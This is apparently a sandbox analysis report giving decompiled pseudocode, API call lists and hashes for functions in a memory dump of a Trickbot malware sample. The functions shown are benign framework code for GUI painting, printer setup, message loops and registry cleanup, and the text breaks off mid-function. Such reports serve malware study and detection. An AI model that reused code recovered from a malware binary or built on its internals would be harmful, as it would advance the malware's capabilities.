                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0041D926(char* _a4, CHAR* _a8) {
                          				short _v524;
                          				short _v1044;
                          				short _v1564;
                          				void* _t19;
                          				int _t20;
                          				char* _t29;
                          				int _t31;
                          				char* _t34;
                          				void* _t37;
                          				void* _t39;
                          
                          				_t34 = _a4;
                          				if(lstrcmpiA(_t34, _a8) != 0) {
                          					L10:
                          					return 0;
                          				}
                          				if(GetSystemMetrics(0x2a) == 0) {
                          					L8:
                          					_t19 = 1;
                          					return _t19;
                          				}
                          				_t20 = lstrlenA(_t34);
                          				if(_t20 != lstrlenA(_a8)) {
                          					goto L10;
                          				}
                          				_t31 = GetThreadLocale();
                          				GetStringTypeA(_t31, 1, _t34, 0xffffffff,  &_v524);
                          				GetStringTypeA(_t31, 4, _t34, 0xffffffff,  &_v1044);
                          				GetStringTypeA(_t31, 1, _a8, 0xffffffff,  &_v1564);
                          				_t29 = _t34;
                          				if( *_t34 == 0) {
                          					goto L8;
                          				}
                          				_t37 = 0;
                          				while(( *(_t39 + _t37 - 0x410) & 0x00000080) == 0 ||  *((intOrPtr*)(_t39 + _t37 - 0x208)) ==  *((intOrPtr*)(_t39 + _t37 - 0x618))) {
                          					_t37 = _t37 + 2;
                          					if( *_t29 != 0) {
                          						continue;
                          					}
                          					goto L8;
                          				}
                          				goto L10;
                          			}

                          APIs
                          • lstrcmpiA.KERNEL32(?,?), ref: 0041D939
                          • GetSystemMetrics.USER32(0000002A), ref: 0041D949
                          • lstrlenA.KERNEL32(?), ref: 0041D95E
                          • lstrlenA.KERNEL32(?), ref: 0041D965
                          • GetThreadLocale.KERNEL32 ref: 0041D96B
                          • GetStringTypeA.KERNEL32(00000000,00000001,?,000000FF,?), ref: 0041D986
                          • GetStringTypeA.KERNEL32(00000000,00000004,?,000000FF,?), ref: 0041D995
                          • GetStringTypeA.KERNEL32(00000000,00000001,?,000000FF,?), ref: 0041D9A6
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                           • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: StringType$lstrlen$LocaleMetricsSystemThreadlstrcmpi
                          • String ID:
                          • API String ID: 1373347803-0
                          • Opcode ID: 6ea4a2bf404da2791ec5b8215527192623c73b6cc160b1ff66e0d5367e28a892
                          • Instruction ID: 6a14a82563ca4a704f9114181d38e82301ce5037ceb9fe3c7245a22d6d86a1db
                          • Opcode Fuzzy Hash: 6ea4a2bf404da2791ec5b8215527192623c73b6cc160b1ff66e0d5367e28a892
                          • Instruction Fuzzy Hash: EF110AF1A002187ADF211B619C44FEB7B6CDB45720F100662FD21922D0E6B49DC1CBA8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E0041BF5F(void* __ecx, char* _a4) {
                          				void* _v8;
                          				void* _t15;
                          				void* _t20;
                          				void* _t35;
                          
                          				_push(__ecx);
                          				_t35 = __ecx;
                          				_t15 =  *(__ecx + 0x98);
                          				if(_t15 != 0) {
                          					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
                          					if(_t15 == 0) {
                          						_t15 = OpenPrinterA(_a4,  &_v8, 0);
                          						if(_t15 != 0) {
                          							_t18 =  *(_t35 + 0x94);
                          							if( *(_t35 + 0x94) != 0) {
                          								E00422790(_t18);
                          							}
                          							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
                          							 *(_t35 + 0x94) = _t20;
                          							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
                          								E00422790( *(_t35 + 0x94));
                          								 *(_t35 + 0x94) = 0;
                          							}
                          							_t15 = ClosePrinter(_v8);
                          						}
                          					}
                          				}
                          				return _t15;
                          			}

                          APIs
                          • GlobalLock.KERNEL32(?), ref: 0041BF7F
                          • lstrcmpA.KERNEL32(?,?), ref: 0041BF8B
                          • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 0041BF9D
                          • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041BFC0
                          • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0041BFC8
                          • GlobalLock.KERNEL32(00000000), ref: 0041BFD5
                          • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 0041BFE2
                          • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 0041C000
                            • Part of subcall function 00422790: GlobalFlags.KERNEL32(?), ref: 0042279A
                            • Part of subcall function 00422790: GlobalUnlock.KERNEL32(?), ref: 004227B1
                            • Part of subcall function 00422790: GlobalFree.KERNEL32(?), ref: 004227BC
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                           • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                          • String ID:
                          • API String ID: 168474834-0
                          • Opcode ID: 70d66128338aa67618be67a9b04304a7c91d9809e7b6a2268bc8d0f082be7a8c
                          • Instruction ID: 7e8450aacf1d13b48321d40fd18e533748c57d59c8ea8b951260583766f53849
                          • Opcode Fuzzy Hash: 70d66128338aa67618be67a9b04304a7c91d9809e7b6a2268bc8d0f082be7a8c
                          • Instruction Fuzzy Hash: E6117071600204BBDB219FB6CD8AEAFBABEEF85744F00042EF609D1151D77A9D509B6C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E0042FA78(intOrPtr __ecx) {
                          				int _v8;
                          				intOrPtr _v12;
                          				struct tagRECT _v28;
                          				intOrPtr _t24;
                          				intOrPtr _t26;
                          				int _t35;
                          				long _t39;
                          				intOrPtr _t40;
                          				int _t42;
                          				void* _t43;
                          
                          				_v12 = __ecx;
                          				_v8 = GetSystemMetrics(6);
                          				_t39 = GetSystemMetrics(5);
                          				_t35 = GetSystemMetrics(0x21);
                          				_t42 = GetSystemMetrics(0x20);
                          				_v28.top = _v8;
                          				_t24 =  *0x44b728; // 0x0
                          				_v28.left = _t39;
                          				_v28.right = _t24 - _t39;
                          				_t26 =  *0x44b72c; // 0x0
                          				_v28.bottom = _t26;
                          				if((E0041B66F(_v12) & 0x00040600) != 0) {
                          					OffsetRect( &_v28, _t42 - _t39, _t35 - _v8);
                          				}
                          				_t40 = _v12;
                          				_push(GetWindowDC( *(_t40 + 0x1c)));
                          				_t43 = E00420D46();
                          				InvertRect( *(_t43 + 4),  &_v28);
                          				return ReleaseDC( *(_t40 + 0x1c),  *(_t43 + 4));
                          			}

                          APIs
                          • GetSystemMetrics.USER32(00000006), ref: 0042FA8C
                          • GetSystemMetrics.USER32(00000005), ref: 0042FA93
                          • GetSystemMetrics.USER32(00000021), ref: 0042FA99
                          • GetSystemMetrics.USER32(00000020), ref: 0042FA9F
                            • Part of subcall function 0041B66F: GetWindowLongA.USER32(?,000000F0), ref: 0041B67B
                          • OffsetRect.USER32(?,00000000,?), ref: 0042FAD8
                          • GetWindowDC.USER32(?), ref: 0042FAE4
                          • InvertRect.USER32(?,?), ref: 0042FAF9
                          • ReleaseDC.USER32(?,?), ref: 0042FB05
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                           • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: MetricsSystem$RectWindow$InvertLongOffsetRelease
                          • String ID:
                          • API String ID: 2500086165-0
                          • Opcode ID: e9687727baa0fc282bcf067000db350be6c9e0aa61a3222eef07cbe541145d50
                          • Instruction ID: 20cf1554b06661d00d5ad6d06b17a24645c94d55b0a7ae413178814da4ea3e85
                          • Opcode Fuzzy Hash: e9687727baa0fc282bcf067000db350be6c9e0aa61a3222eef07cbe541145d50
                          • Instruction Fuzzy Hash: 4211E676D00218ABCB109FF9DD4999EBFB8EB48360F104566EA05E3250D7B5AD40CB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 78%
                          			E00428FDD(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
                          				intOrPtr _v8;
                          				signed int _v12;
                          				intOrPtr _v16;
                          				intOrPtr* _v20;
                          				struct tagPOINT _v28;
                          				intOrPtr _v36;
                          				signed char _v65;
                          				char _v72;
                          				void* _t58;
                          				void* _t60;
                          				intOrPtr _t64;
                          				intOrPtr _t67;
                          				intOrPtr _t110;
                          				intOrPtr _t111;
                          				intOrPtr* _t113;
                          
                          				_t110 = _a4;
                          				_t113 = __ecx;
                          				if(E00419115(__ecx, _t110) != 0) {
                          					L38:
                          					_t58 = 1;
                          					return _t58;
                          				}
                          				_t111 =  *((intOrPtr*)(_t110 + 4));
                          				_v20 = E004043F9(__ecx);
                          				if(( *(__ecx + 0x64) & 0x00000020) != 0 || _t111 == 0x201 || _t111 == 0x202) {
                          					if(_t111 < 0x200 || _t111 > 0x209) {
                          						if(_t111 < 0xa0 || _t111 > 0xa9) {
                          							goto L30;
                          						} else {
                          							goto L8;
                          						}
                          					} else {
                          						L8:
                          						_v16 = E00432335();
                          						_t67 = _a4;
                          						_v28.y =  *((intOrPtr*)(_t67 + 0x18));
                          						_v28.x =  *(_t67 + 0x14);
                          						ScreenToClient( *(_t113 + 0x1c),  &_v28);
                          						E00405360( &_v72, 0, 0x2c);
                          						_v72 = 0x28;
                          						_v8 =  *((intOrPtr*)( *_t113 + 0x64))(_v28.x, _v28.y,  &_v72);
                          						if(_v36 != 0xffffffff) {
                          							E004053B8(_v36);
                          						}
                          						if(_t111 != 0x201 || (_v65 & 0x00000080) == 0) {
                          							_v12 = _v12 & 0x00000000;
                          							if(_t111 != 0x201 && GetKeyState(1) < 0) {
                          								_v8 =  *((intOrPtr*)(_v16 + 0x104));
                          							}
                          						} else {
                          							_v12 = 1;
                          						}
                          						if(_v8 < 0 || _v12 != 0) {
                          							if(GetKeyState(1) >= 0 || _v12 != 0) {
                          								 *((intOrPtr*)( *_t113 + 0xdc))(0xffffffff);
                          								KillTimer( *(_t113 + 0x1c), 0xe001);
                          							}
                          							goto L29;
                          						} else {
                          							if(_t111 != 0x202) {
                          								if(( *(_t113 + 0x60) & 0x00000008) != 0 || GetKeyState(1) < 0) {
                          									 *((intOrPtr*)( *_t113 + 0xdc))(_v8);
                          								} else {
                          									if(_v8 ==  *((intOrPtr*)(_v16 + 0x104))) {
                          										L29:
                          										 *((intOrPtr*)(_v16 + 0x104)) = _v8;
                          										goto L30;
                          									}
                          									_push(0x12c);
                          									_push(0xe000);
                          									L20:
                          									E00428DA0(_t113);
                          								}
                          								goto L29;
                          							}
                          							 *((intOrPtr*)( *_t113 + 0xdc))(0xffffffff);
                          							_push(0xc8);
                          							_push(0xe001);
                          							goto L20;
                          						}
                          					}
                          				} else {
                          					L30:
                          					_t60 = E00419EDA(_t113);
                          					if(_t60 == 0 ||  *((intOrPtr*)(_t60 + 0x50)) == 0) {
                          						if(_v20 == 0) {
                          							L36:
                          							return E0041AFF4(_a4);
                          						} else {
                          							goto L34;
                          						}
                          						while(1) {
                          							L34:
                          							_t112 = _v20;
                          							_push(_a4);
                          							if( *((intOrPtr*)( *_v20 + 0x90))() != 0) {
                          								goto L38;
                          							}
                          							_t64 = E00419D7A(_t112);
                          							_v20 = _t64;
                          							if(_t64 != 0) {
                          								continue;
                          							}
                          							goto L36;
                          						}
                          						goto L38;
                          					} else {
                          						return 0;
                          					}
                          				}
                          			}

                          APIs
                            • Part of subcall function 004043F9: GetParent.USER32(?), ref: 00404403
                          • ScreenToClient.USER32(?,?), ref: 00429067
                          • GetKeyState.USER32(00000001), ref: 004290C4
                          • GetKeyState.USER32(00000001), ref: 00429116
                          • GetKeyState.USER32(00000001), ref: 0042914C
                          • KillTimer.USER32(?,0000E001), ref: 00429171
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
• Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
• Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: State$ClientKillParentScreenTimer
                          • String ID: (
                          • API String ID: 2757461879-3887548279
                          • Opcode ID: 99708c99224e2de77ad7276b3c19d6ceab9830e13a6620b52319f3961abafa49
                          • Instruction ID: 0f21b9813812b9d55b8571ada79f830b202ea128cc7ea093b184e42a1602d1c4
                          • Opcode Fuzzy Hash: 99708c99224e2de77ad7276b3c19d6ceab9830e13a6620b52319f3961abafa49
                          • Instruction Fuzzy Hash: E351C031B0022AAFEF249F95D84CBBE7BB1AF44314F54006BE905A72D1C7B89D91CB59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 95%
                          			E00413961(void* __eax, intOrPtr* __ebx, signed int __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                          				struct tagPAINTSTRUCT _v64;
                          				signed int* _t16;
                          				struct HDC__* _t46;
                          				int _t55;
                          				struct HDC__* _t58;
                          				struct HDC__* _t60;
                          				struct HWND__* _t65;
                          				void* _t73;
                          				void* _t74;
                          
                          				_t16 = __eax +  *__ebx + 5;
                          				 *__ecx =  *__ecx | __ecx;
                          				es = es;
                          				 *__ecx =  *__ecx | __ecx;
                          				 *_t16 =  *_t16 | __ecx;
                          				 *_t16 =  *_t16 | __ecx;
                          				asm("int3");
                          				_t74 = _t73 - 0x40;
                          				_push(__ebx);
                          				_t55 = _a8;
                          				_t87 = _t55 - 0x82;
                          				if(_t55 != 0x82) {
                          					_t65 = _a4;
                          					__eflags = GetPropA(_t65, 0);
                          					if(__eflags == 0) {
                          						__eflags = _t55 - 0xf;
                          						if(__eflags > 0) {
                          							__eflags = _t55 - 0x1943;
                          							if(__eflags < 0) {
                          								goto L10;
                          							} else {
                          								__eflags = _t55 - 0x1944;
                          								if(__eflags <= 0) {
                          									 *_a16 = 1;
                          									return 0x3ec;
                          								} else {
                          									goto L10;
                          								}
                          							}
                          						} else {
                          							if(__eflags == 0) {
                          								_t46 = _a12;
                          								_t58 = _t46;
                          								__eflags = _t58;
                          								if(_t58 == 0) {
                          									_t58 = BeginPaint(_t65,  &_v64);
                          									E00410AD0(_t65, _t30);
                          									_t74 = _t74 + 8;
                          								}
                          								E004137D0(_t65, _t58);
                          								__eflags = _t46;
                          								if(_t46 == 0) {
                          									EndPaint(_t65,  &_v64);
                          								}
                          								__eflags = 0;
                          								return 0;
                          							} else {
                          								__eflags = _t55 - 0xa;
                          								if(__eflags == 0) {
                          									_t60 = GetDC(_t65);
                          									E00410AD0(_t65, _t32);
                          									E004137D0(_t65, _t60);
                          									ReleaseDC(_t65, _t60);
                          									__eflags = 0;
                          									return 0;
                          								} else {
                          									L10:
                          									return CallWindowProcA(E00410610(__eflags, _t65, 4), _t65, _t55, _a12, _a16);
                          								}
                          							}
                          						}
                          					} else {
                          						return CallWindowProcA(E00410610(__eflags, _t65, 4), _t65, _t55, _a12, _a16);
                          					}
                          				} else {
                          					return E00410840(_t87, _a4, _t55, _a12, _a16, 4);
                          				}
                          			}

                          APIs
                          • GetPropA.USER32(?,00000000), ref: 004139B3
                          • CallWindowProcA.USER32(00000000), ref: 004139D5
                            • Part of subcall function 00410840: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 00410866
                            • Part of subcall function 00410840: RemovePropA.USER32(?,00000000), ref: 0041087E
                            • Part of subcall function 00410840: RemovePropA.USER32(?,00000000), ref: 0041088A
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
• Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
• Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Prop$CallProcRemoveWindow
                          • String ID:
                          • API String ID: 2276450057-0
                          • Opcode ID: 6fee93ec7ca43d0762215e20fa488f34072c8f9a387738dd55526872c13f8751
                          • Instruction ID: f1572104d6aad6c7c6e2dfa605bf4f658f6bdfab918f599bf59773d80d73c62f
                          • Opcode Fuzzy Hash: 6fee93ec7ca43d0762215e20fa488f34072c8f9a387738dd55526872c13f8751
                          • Instruction Fuzzy Hash: C931F6B77002106BD2019B95AC85EEFB75CDFD53A6F040426F94587201D3B95E4A87BA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 97%
                          			E0041B024(intOrPtr* __ecx) {
                          				struct HWND__* _t45;
                          				intOrPtr* _t54;
                          				int _t63;
                          				signed int _t66;
                          				intOrPtr _t67;
                          				intOrPtr* _t78;
                          				struct tagMSG* _t80;
                          				void* _t81;
                          
                          				_t67 = 1;
                          				_t78 = __ecx;
                          				 *((intOrPtr*)(_t81 + 0x18)) = _t67;
                          				 *(_t81 + 0x14) = 0;
                          				if(( *(_t81 + 0x28) & 0x00000004) == 0) {
                          					L2:
                          					 *((intOrPtr*)(_t81 + 0x10)) = 0;
                          					L3:
                          					_t45 = GetParent( *(_t78 + 0x1c));
                          					 *(_t78 + 0x24) =  *(_t78 + 0x24) | 0x00000018;
                          					 *(_t81 + 0x1c) = _t45;
                          					_t80 = E0041C00C() + 0x30;
                          					L4:
                          					while( *((intOrPtr*)(_t81 + 0x18)) == 0 || PeekMessageA(_t80, 0, 0, 0, 0) != 0) {
                          						while( *((intOrPtr*)( *((intOrPtr*)(E0041C00C())) + 0x5c))() != 0) {
                          							if( *((intOrPtr*)(_t81 + 0x10)) != 0) {
                          								_t63 = _t80->message;
                          								if(_t63 == 0x118 || _t63 == 0x104) {
                          									E0041B7D3(_t78, 1);
                          									UpdateWindow( *(_t78 + 0x1c));
                          									 *((intOrPtr*)(_t81 + 0x10)) = 0;
                          								}
                          							}
                          							if( *((intOrPtr*)( *_t78 + 0x70))() == 0) {
                          								 *(_t78 + 0x24) =  *(_t78 + 0x24) & 0xffffffe7;
                          								return  *((intOrPtr*)(_t78 + 0x2c));
                          							} else {
                          								_t54 = E0041C00C();
                          								_push(_t80);
                          								if( *((intOrPtr*)( *_t54 + 0x64))() != 0) {
                          									 *((intOrPtr*)(_t81 + 0x18)) = 1;
                          									 *(_t81 + 0x14) = 0;
                          								}
                          								if(PeekMessageA(_t80, 0, 0, 0, 0) != 0) {
                          									continue;
                          								} else {
                          									goto L4;
                          								}
                          							}
                          						}
                          						return E00437058(0) | 0xffffffff;
                          					}
                          					if( *((intOrPtr*)(_t81 + 0x10)) != 0) {
                          						E0041B7D3(_t78, 1);
                          						UpdateWindow( *(_t78 + 0x1c));
                          						 *((intOrPtr*)(_t81 + 0x10)) = 0;
                          					}
                          					if(( *(_t81 + 0x24) & 0x00000001) == 0 &&  *(_t81 + 0x1c) != 0 &&  *(_t81 + 0x14) == 0) {
                          						SendMessageA( *(_t81 + 0x28), 0x121, 0,  *(_t78 + 0x1c));
                          					}
                          					if(( *(_t81 + 0x24) & 0x00000002) != 0) {
                          						L14:
                          						 *((intOrPtr*)(_t81 + 0x18)) = 0;
                          						goto L4;
                          					} else {
                          						 *(_t81 + 0x14) =  *(_t81 + 0x14) + 1;
                          						if(SendMessageA( *(_t78 + 0x1c), 0x36a, 0,  *(_t81 + 0x14)) != 0) {
                          							goto L4;
                          						}
                          						goto L14;
                          					}
                          				}
                          				_t66 = E0041B66F(__ecx);
                          				 *((intOrPtr*)(_t81 + 0x10)) = _t67;
                          				if((_t66 & 0x10000000) == 0) {
                          					goto L3;
                          				}
                          				goto L2;
                          			}

                          APIs
                          • GetParent.USER32(?), ref: 0041B058
                          • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 0041B081
                          • UpdateWindow.USER32(?), ref: 0041B09D
                          • SendMessageA.USER32(?,00000121,00000000,?), ref: 0041B0C3
                          • SendMessageA.USER32(?,0000036A,00000000,00000001), ref: 0041B0E2
                          • UpdateWindow.USER32(?), ref: 0041B125
                          • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 0041B158
                            • Part of subcall function 0041B66F: GetWindowLongA.USER32(?,000000F0), ref: 0041B67B
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
• Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
• Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Message$Window$PeekSendUpdate$LongParent
                          • String ID:
                          • API String ID: 2853195852-0
                          • Opcode ID: 00246c3e6967ef0e80c0ab1cc6dc52d9380ed2ccbf97ad08c2a39e81431774a6
                          • Instruction ID: 31f445390621a16856a2414b5fbfb049f5f3e82eeee6a95fe5b96b1665f749f0
                          • Opcode Fuzzy Hash: 00246c3e6967ef0e80c0ab1cc6dc52d9380ed2ccbf97ad08c2a39e81431774a6
                          • Instruction Fuzzy Hash: 63419230604741ABD7319F26DC44A5BBFE8FFC5B44F104A1EF49582291C779C985CA9A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00410920(struct HDC__* _a4, signed short _a8, signed int _a12) {
                          				long* _v0;
                          				struct tagRECT _v24;
                          				signed short _t56;
                          				long _t57;
                          				long* _t73;
                          				long* _t75;
                          				struct HDC__* _t78;
                          				long _t79;
                          				signed short _t81;
                          
                          				_t78 = _a4;
                          				_t79 = SetBkColor(_t78,  *(0x44d364 + (_a12 & 0x0000ffff) * 4));
                          				_t73 = _v0;
                          				_t75 =  &_v24;
                          				 *_t75 =  *_t73;
                          				_t75[1] = _t73[1];
                          				_t75[2] = _t73[2];
                          				_t81 = _a12;
                          				_t75[3] = _t73[3];
                          				_v24.bottom = _v24.top + 1;
                          				if((_t81 & 0x00000002) != 0) {
                          					ExtTextOutA(_t78, 0, 0, 2,  &_v24, 0, 0, 0);
                          				}
                          				_v24.bottom = _t73[3];
                          				_v24.right = _v24.left + 1;
                          				if((_t81 & 0x00000001) != 0) {
                          					ExtTextOutA(_t78, 0, 0, 2,  &_v24, 0, 0, 0);
                          				}
                          				_t56 = _a8;
                          				if(_a4 != _t56) {
                          					SetBkColor(_t78,  *(0x44d364 + (_t56 & 0x0000ffff) * 4));
                          				}
                          				_t57 = _t73[2];
                          				_v24.right = _t57;
                          				_v24.left = _t57 - 1;
                          				if((_t81 & 0x00000004) != 0) {
                          					ExtTextOutA(_t78, 0, 0, 2,  &_v24, 0, 0, 0);
                          				}
                          				if((_t81 & 0x00000008) != 0) {
                          					_v24.left =  *_t73;
                          					_v24.top = _v24.bottom - 1;
                          					if((_t81 & 0x00001000) != 0) {
                          						_v24.right = _v24.right - 2;
                          					}
                          					ExtTextOutA(_t78, 0, 0, 2,  &_v24, 0, 0, 0);
                          				}
                          				return SetBkColor(_t78, _t79);
                          			}

                          APIs
                          • SetBkColor.GDI32(?), ref: 0041093D
                          • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041098A
                          • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004109B9
                          • SetBkColor.GDI32(?,?), ref: 004109D7
                          • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00410A02
                          • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00410A3C
                          • SetBkColor.GDI32(?,00000000), ref: 00410A44
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Text$Color
                          • String ID:
                          • API String ID: 3751486306-0
                          • Opcode ID: 06f5cdfce198b5b2a52e07e810c7c96cfe67ff17812323b5b90734aa62515e25
                          • Instruction ID: 1c061ff726cae08de12fbe614769f7947114dc32f4dedc248ef856f9a42cc059
                          • Opcode Fuzzy Hash: 06f5cdfce198b5b2a52e07e810c7c96cfe67ff17812323b5b90734aa62515e25
                          • Instruction Fuzzy Hash: 15416B70644302AFE320DF14CC86F6AB7E4FB84B40F144819FA54AB2C1D7B5E949CB6A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 80%
                          			// Shape is consistent with MFC's CWinApp::Unregister: walk the document templates, then remove the
                          			// application's own HKCU\Software\<registry key>\<profile name> tree. The registry calls here are
                          			// cleanup code of a statically linked GUI framework, not the sample's persistence logic.
                          			E00431CEE(void* __ecx, void* __eflags) {
                          				intOrPtr _t36;
                          				void* _t37;
                          				void* _t42;
                          				intOrPtr* _t61;
                          				void* _t79;
                          				void* _t84;
                          
                          				E00405340(E004382A4, _t84);                          // __EH_prolog: install the SEH frame that unwinds the CString temporaries
                          				_t79 = __ecx;                                       // this
                          				 *(_t84 - 0x14) = 0;                                // HKEY hKey = NULL
                          				_t36 = E004287E0(__ecx);                            // first position of a template-like list (GetFirstDocTemplatePosition in Unregister)
                          				 *((intOrPtr*)(_t84 - 0x1c)) = _t36;
                          				if(_t36 != 0) {
                          					do {
                          						_t61 = E004287F2(_t79, _t84 - 0x1c);             // next element, advances the position (GetNextDocTemplate)
                          						if(_t61 != 0) {
                          							 *((intOrPtr*)( *_t61 + 0xc))(0, 0xfffffffc, 0, 0);   // virtual call through slot +0xc with a negative notification code (-4)
                          						}
                          					} while ( *((intOrPtr*)(_t84 - 0x1c)) != 0);
                          				}
                          				if( *((intOrPtr*)(_t79 + 0x7c)) != 0) {                // this+0x7c: registry key name pointer (m_pszRegistryKey)
                          					E00417F36(_t84 - 0x10, _t84, "Software\\");         // CString strKey("Software\\")
                          					 *(_t84 - 4) = 0;
                          					E004181A3(_t84 - 0x10,  *((intOrPtr*)(_t79 + 0x7c)));   // strKey += registry key name
                          					_push(0x43d1e4);                                   // string literal at 0x43d1e4 (separator; value not shown in this listing)
                          					_push(_t84 - 0x10);
                          					_push(_t84 - 0x20);
                          					_t42 = E004180D0(_t84 - 0x10);                     // temp = strKey + literal
                          					_push( *((intOrPtr*)(_t79 + 0x90)));                // this+0x90: profile name pointer (m_pszProfileName)
                          					 *(_t84 - 4) = 1;
                          					_push(_t42);
                          					_push(_t84 - 0x18);
                          					E004180D0(_t84 - 0x10);                            // strSubKey = temp + profile name
                          					 *(_t84 - 4) = 3;
                          					E00417EC8(_t84 - 0x20);                            // ~CString temp
                          					E00431E1D(0x80000001, _t84 - 0x18);                // helper on HKCU\strSubKey (the recursive subtree delete in Unregister)
                          					if(RegOpenKeyA(0x80000001,  *(_t84 - 0x10), _t84 - 0x14) == 0) {      // 0x80000001 = HKEY_CURRENT_USER
                          						if(RegEnumKeyA( *(_t84 - 0x14), 0, _t84 - 0x12c, 0x104) == 0x103) {  // 0x104 = MAX_PATH buffer; 0x103 = ERROR_NO_MORE_ITEMS, i.e. no subkeys left
                          							E00431E1D(0x80000001, _t84 - 0x10);                              // ...so remove the now-empty parent key as well
                          						}
                          						RegCloseKey( *(_t84 - 0x14));
                          					}
